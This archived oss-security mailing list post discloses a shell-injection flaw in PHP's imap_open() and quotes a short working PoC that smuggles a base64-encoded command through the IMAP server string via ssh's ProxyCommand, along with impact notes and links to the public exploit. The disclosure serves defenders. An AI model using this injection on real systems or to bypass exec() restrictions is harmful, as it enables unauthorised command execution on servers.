Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Thu, 22 Nov 2018 21:02:14 +0100
From: Hanno Böck <hanno@...eck.de>
To: oss-security@...ts.openwall.com
Subject: PHP imap_open() script injection

Hi,

This was apparently posted on some russian forum recently and then
re-posted to github:
https://antichat.com/threads/463395/#post-4254681
https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php

PoC code:
$server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());

It's pretty self explaining, it seems imap_open() will pass things to
ssh and this is vulnerable to a shell injection.

Impact would be mostly relevant if someone has some imap functionality
where a user can define a custom imap server. (Though it might also be
used as a bypass for environments where exec() and similar functions
are restricted.)

I reported it to upstream PHP a few days ago, it was closed as a
duplicate, so it seems they already knew about it. It's unfixed in
current versions.

There seems to be some speculation that this might've been involved in a
hack of a .onion hoster:
https://danwin1210.me/


-- 
Hanno Böck
https://hboeck.de/

mail/jabber: hanno@...eck.de
GPG: FE73757FA60E4E21B937579FA5880072BBB51E42

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.